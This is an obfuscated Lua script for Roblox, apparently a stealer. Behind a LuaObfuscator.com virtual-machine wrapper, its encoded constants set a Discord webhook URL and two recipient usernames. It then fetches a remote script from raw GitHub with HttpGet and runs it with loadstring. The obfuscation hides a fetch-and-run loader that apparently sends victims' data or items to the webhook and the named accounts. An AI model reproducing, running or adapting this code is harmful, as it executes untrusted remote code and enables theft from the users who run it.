--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=v2(v0(v30,16));if v19 then local v88=v5(v82,v19);v19=nil;return v88;else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=(v31/((5 -(1 + 2))^(v32-(2 -1))))%((3 -1)^(((v33-(2 -(1 + 0))) -(v32-1)) + (620 -(555 + 64)))) ;return v83-(v83%(932 -(857 + 74))) ;else local v84=(570 -(367 + 201))^(v32-1) ;return (((v31%(v84 + v84))>=v84) and (928 -(214 + 713))) or 0 ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=877 -(282 + 595) ;local v36;local v37;while true do if (v35==(1638 -(1523 + 114))) then return (v37 * (251 + 5)) + v36 ;end if (v35==(0 + 0)) then v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (8 -6) ;v35=1 -0 ;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (960 -(892 + 65)) );v18=v18 + 4 ;return (v41 * (40022563 -23245347)) + (v40 * (121138 -(55952 -(87 + 263)))) + (v39 * (469 -213)) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=1;local v45=(v20(v43,181 -(67 + 113) ,15 + 5 ) * ((4 -2)^(24 + 0 + 8))) + v42 ;local v46=v20(v43,83 -62 ,(1774 -(368 + 423)) -(802 + 150) );local v47=((v20(v43,85 -53 )==(1 -0)) and  -(1 + 0)) or 1 ;if (v46==(997 -(915 + 82))) then if (v45==0) then return v47 * (0 -0) ;else v46=(3 -2) + 0 ;v44=0 -0 ;end elseif (v46==((3252 -(10 + 8)) -(1069 + 118))) then return ((v45==(0 -0)) and (v47 * ((1 -(0 -0))/0))) or (v47 * NaN) ;end return v8(v47,v46-1023 ) * (v44 + (v45/((1 + 1)^(92 -40)))) ;end local function v25(v48)local v49=442 -(416 + 26) ;local v50;local v51;while true do if (v49==((12 -9) -2)) then v50=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;v49=3 -(1 + 0) ;end if (v49==(441 -(145 + 293))) then return v6(v51);end if (v49==((1568 -(116 + 1022)) -(44 + (1409 -1023)))) then v50=nil;if  not v48 then v48=v23();if (v48==(1486 -(998 + 488))) then return "";end end v49=1 + 0 ;end if (v49==(2 + 0)) then v51={};for v89=773 -(201 + 571) , #v50 do v51[v89]=v2(v1(v3(v50,v89,v89)));end v49=3;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=1581 -(1535 + 46) ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52~=(0 + 0)) then else v53=0 + 0 ;v54=nil;v52=561 -(306 + 254) ;end if (v52==(1 + 3)) then while true do if (v53==3) then v60=nil;while true do local v97=0 -0 ;local v98;while true do if (v97~=0) then else v98=1467 -(899 + 568) ;while true do if (v98==0) then local v150=0 + 0 ;while true do if (v150~=1) then else v98=1;break;end if (v150==0) then if (0~=v54) then else local v156=0;while true do if (v156~=0) then else local v159=0 -0 ;while true do if ((603 -(268 + 335))~=v159) then else v55={};v56={};v159=291 -(60 + 230) ;end if (v159==(573 -(426 + 146))) then v156=1;break;end end end if (v156==(1 + 1)) then v54=1;break;end if (v156==(1457 -(282 + 1174))) then local v160=811 -(569 + 242) ;while true do if (v160~=(0 -0)) then else local v161=0;while true do if (v161~=1) then else v160=1 + 0 ;break;end if (v161==(1024 -(706 + 318))) then v57={};v58={v55,v56,nil,v57};v161=1;end end end if (v160==1) then v156=2;break;end end end end end if (v54==(2 -1)) then local v157=0 + 0 ;local v158;while true do if (0~=v157) then else v158=700 -(271 + 429) ;while true do if (0==v158) then local v162=0 + 0 ;local v163;while true do if (v162~=(1500 -(1408 + 92))) then else v163=1086 -(461 + 625) ;while true do if (v163==(1289 -(993 + 295))) then v158=1;break;end if (v163==0) then v59=v23();v60={};v163=1 + 0 ;end end break;end end end if (v158==2) then v54=2;break;end if ((1172 -(418 + 753))~=v158) then else for v167=1 + 0 ,v59 do local v168=0 + 0 ;local v169;local v170;local v171;local v172;local v173;while true do if (v168~=(1 + 1)) then else v173=nil;while true do if (v169==0) then local v175=0;while true do if ((1 + 0)==v175) then v169=1;break;end if (v175~=0) then else v170=0;v171=nil;v175=530 -(406 + 123) ;end end end if (v169==1) then v172=nil;v173=nil;v169=1771 -(1749 + 20) ;end if ((1 + 1)==v169) then while true do if (v170~=1) then else v173=nil;while true do if ((1323 -(1249 + 73))==v171) then if (v172==1) then v173=v21()~=(0 + 0) ;elseif (v172==2) then v173=v24();elseif (v172==3) then v173=v25();end v60[v167]=v173;break;end if (v171==(1145 -(466 + 679))) then local v183=0 -0 ;local v184;while true do if (v183==0) then v184=0 -0 ;while true do if (v184==(1900 -(106 + 1794))) then v172=v21();v173=nil;v184=1 + 0 ;end if (v184==1) then v171=1;break;end end break;end end end end break;end if ((0 + 0)==v170) then local v176=0;while true do if (v176==0) then local v185=0 -0 ;while true do if (v185==(2 -1)) then v176=1;break;end if (0==v185) then v171=0;v172=nil;v185=1;end end end if ((115 -(4 + 110))==v176) then v170=585 -(57 + 527) ;break;end end end end break;end end break;end if (1==v168) then v171=nil;v172=nil;v168=2;end if (0==v168) then v169=1427 -(41 + 1386) ;v170=nil;v168=104 -(17 + 86) ;end end end v58[3 + 0 ]=v21();v158=3 -1 ;end end break;end end end v150=1;end end end if (v98==1) then if (2==v54) then local v153=0;while true do local v154=0 -0 ;local v155;while true do if ((166 -(122 + 44))==v154) then v155=0;while true do if (v155==(0 -0)) then if ((0 -0)~=v153) then else local v165=0 + 0 ;local v166;while true do if (v165~=0) then else v166=0;while true do if (v166==(1 + 0)) then v153=1;break;end if (v166~=0) then else local v174=0 -0 ;while true do if (1==v174) then v166=1;break;end if (v174==0) then for v177=1,v23() do local v178=0;local v179;while true do if (v178==(65 -(30 + 35))) then v179=v21();if (v20(v179,1,1 + 0 )==0) then local v186=1257 -(1043 + 214) ;local v187;local v188;local v189;local v190;local v191;while true do if (v186==(3 -2)) then v189=nil;v190=nil;v186=2;end if ((1214 -(323 + 889))~=v186) then else v191=nil;while true do if (v187~=(0 -0)) then else local v193=0;while true do if (v193~=(580 -(361 + 219))) then else v188=320 -(53 + 267) ;v189=nil;v193=1;end if ((1 + 0)==v193) then v187=414 -(15 + 398) ;break;end end end if (1==v187) then local v194=0;while true do if (v194~=0) then else local v195=0;while true do if ((983 -(18 + 964))==v195) then v194=1;break;end if (v195~=0) then else v190=nil;v191=nil;v195=1;end end end if (v194~=(3 -2)) then else v187=2 + 0 ;break;end end end if (v187==2) then while true do if (v188==(1 + 0)) then local v196=850 -(20 + 830) ;local v197;local v198;while true do if (v196==(0 + 0)) then v197=126 -(116 + 10) ;v198=nil;v196=1;end if (v196==(1 + 0)) then while true do if (v197~=(738 -(542 + 196))) then else v198=0 -0 ;while true do if (v198==1) then v188=1 + 1 ;break;end if (v198==0) then v191={v22(),v22(),nil,nil};if (v189==0) then local v210=0;local v211;while true do if (v210~=0) then else v211=0 -0 ;while true do if (v211~=(0 -0)) then else v191[1554 -(1126 + 425) ]=v22();v191[409 -(118 + 287) ]=v22();break;end end break;end end elseif (v189==(3 -2)) then v191[1124 -(118 + 1003) ]=v23();elseif (v189==(5 -3)) then v191[3]=v23() -(2^(393 -(142 + 235))) ;elseif (v189~=(13 -10)) then else local v216=0;while true do if (v216~=(0 + 0)) then else v191[980 -(553 + 424) ]=v23() -((3 -1)^16) ;v191[4 + 0 ]=v22();break;end end end v198=1;end end break;end end break;end end end if (v188==2) then local v199=0 + 0 ;while true do if (v199~=(0 + 0)) then else if (v20(v190,1 + 0 ,1)==1) then v191[2]=v60[v191[2 + 0 ]];end if (v20(v190,4 -2 ,5 -3 )==(2 -1)) then v191[3]=v60[v191[3]];end v199=1 + 0 ;end if (v199~=(4 -3)) then else v188=3;break;end end end if (3==v188) then if (v20(v190,756 -(239 + 514) ,3)~=1) then else v191[2 + 2 ]=v60[v191[4]];end v55[v177]=v191;break;end if (v188==(1329 -(797 + 532))) then local v201=0;local v202;local v203;while true do if (v201==(1 + 0)) then while true do if (v202~=(0 + 0)) then else v203=0;while true do if (v203~=(2 -1)) then else v188=1;break;end if (v203~=(1202 -(373 + 829))) then else v189=v20(v179,733 -(476 + 255) ,1133 -(369 + 761) );v190=v20(v179,3 + 1 ,6);v203=1 -0 ;end end break;end end break;end if (0==v201) then v202=0 -0 ;v203=nil;v201=1;end end end end break;end end break;end if (v186~=0) then else local v192=238 -(64 + 174) ;while true do if (v192~=(0 + 0)) then else v187=0 -0 ;v188=nil;v192=1;end if (v192==(337 -(144 + 192))) then v186=217 -(42 + 174) ;break;end end end end end break;end end end for v180=1 + 0 ,v23() do v56[v180-(1 + 0) ]=v28();end v174=1 + 0 ;end end end end break;end end end if (v153~=(1505 -(363 + 1141))) then else return v58;end break;end end break;end end end end break;end end break;end end end break;end if (v53==(1580 -(1183 + 397))) then v54=0;v55=nil;v53=1;end if (v53~=1) then else local v95=0;local v96;while true do if (v95~=(0 -0)) then else v96=0 + 0 ;while true do if (v96~=1) then else v53=2 + 0 ;break;end if (v96==0) then local v145=1975 -(1913 + 62) ;while true do if (v145==(1 + 0)) then v96=1;break;end if (v145==0) then v56=nil;v57=nil;v145=1;end end end end break;end end end if (v53==2) then v58=nil;v59=nil;v53=3;end end break;end if (v52~=1) then else v55=nil;v56=nil;v52=2;end if (v52~=(7 -4)) then else v59=nil;v60=nil;v52=4;end if (v52~=2) then else v57=nil;v58=nil;v52=3;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v67=v64;local v68=v65;local v69=v66;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v85=0,v75 do if (v85>=v69) then v73[v85-v69 ]=v74[v85 + 1 ];else v77[v85]=v74[v85 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=5) then if (v80<=2) then if (v80<=0) then v71=v79[3];elseif (v80==1) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end else v77[v79[2]][v79[3]]=v79[4];end elseif (v80<=3) then local v100=0;local v101;local v102;local v103;local v104;while true do if (v100==1) then v72=(v103 + v101) -1 ;v104=0;v100=2;end if (v100==0) then v101=v79[2];v102,v103=v70(v77[v101](v13(v77,v101 + 1 ,v79[3])));v100=1;end if (v100==2) then for v147=v101,v72 do v104=v104 + 1 ;v77[v147]=v102[v104];end break;end end elseif (v80>4) then local v113;local v114,v115;local v116;local v117;v77[v79[2]][v79[3]]=v79[4];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v63[v79[3]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v63[v79[3]];v71=v71 + 1 ;v79=v67[v71];v117=v79[2];v116=v77[v79[3]];v77[v117 + 1 ]=v116;v77[v117]=v116[v79[4]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3]~=0 ;v71=v71 + 1 ;v79=v67[v71];v117=v79[2];v114,v115=v70(v77[v117](v13(v77,v117 + 1 ,v79[3])));v72=(v115 + v117) -1 ;v113=0;for v142=v117,v72 do v113=v113 + 1 ;v77[v142]=v114[v113];end v71=v71 + 1 ;v79=v67[v71];v117=v79[2];v77[v117]=v77[v117](v13(v77,v117 + 1 ,v72));v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]();v71=v71 + 1 ;v79=v67[v71];v71=v79[3];else v77[v79[2]]=v79[3];end elseif (v80<=8) then if (v80<=6) then v77[v79[2]][v79[3]]=v79[4];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v63[v79[3]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]][v79[3]]=v79[4];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v71=v79[3];elseif (v80==7) then v77[v79[2]]=v79[3]~=0 ;else v77[v79[2]]();end elseif (v80<=10) then if (v80>9) then v77[v79[2]]=v63[v79[3]];else local v134=0;local v135;while true do if (v134==0) then v135=v79[2];v77[v135]=v77[v135](v13(v77,v135 + 1 ,v72));break;end end end elseif (v80>11) then local v136=v79[2];local v137=v77[v79[3]];v77[v136 + 1 ]=v137;v77[v136]=v137[v79[4]];else do return;end end v71=v71 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0D3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F4O313638373332333830363038313033352F58335676464158694D71614B46474E43317A68324F4C74684F48395135784D5A49733476704E455A765A5268586F4157475767644A36756F47613038674F515345324851030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034A3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4C7970686572585A63726970742F6D61696E2F4C79706865725363726970747303083O00557365724E616D6503083O006672692O7377767903093O00557365724E616D653203063O005938414D4F5200173O0012043O00013O0026013O000E0001000200044O000E000100120A000100033O00300500010004000500122O000100063O00122O000200073O00202O00020002000800122O000400096O000500016O000200056O00013O00024O00010001000100044O001600010026013O00010001000100044O0001000100120A000100033O0030060001000A000B00122O000100033O00302O0001000C000D00124O00023O00044O000100012O000B3O00017O00",v9(),...);end
